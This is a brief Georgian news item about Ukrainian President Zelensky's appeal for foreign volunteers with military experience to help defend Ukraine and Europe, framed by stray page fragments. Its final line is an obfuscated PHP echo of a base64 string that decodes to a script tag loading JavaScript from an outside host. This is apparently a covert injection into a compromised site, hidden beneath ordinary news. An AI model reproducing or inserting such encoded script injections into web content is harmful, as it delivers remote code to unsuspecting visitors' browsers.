celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ მოუწოდა მოხალისეებს მთელი მსოფლიოდან, რომ ჩავიდნენ უკრაინაში და ევროპა უკრაინელებთან ერთად დაიცვან.
 
ზელენსკიმ უკრაინის მხარდამჭერ ევროპელებს მოუწოდა, ეს მხარდაჭერა მათ ქვეყნებში უკრაინის საელჩოებში დააფიქსირონ.
 
"თუ თქვენ გაქვთ სამხედრო გამოცდილება, შეგიძლიათ მოხვიდეთ ჩვენთან და ჩვენთან ერთად დაიცვათ ევროპა," - განაცხადა ზელენსკიმ.
 
ზელენსკის ოფიციალურ ტელეგრამ არხზე ახალი ვიდეომიმართვა გამოჩნდა, რომელშიც უკრაინის პრეზიდენტი ამბობს, რომ უკრაინაში შეჭრა არა მხოლოდ ერთი ქვეყნის წინააღმდეგ განხორციელებული აგრესიაა, არამედ ეს არის ომის დასაწყისი ევროპის წინააღმდეგ.
 
 
1009
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");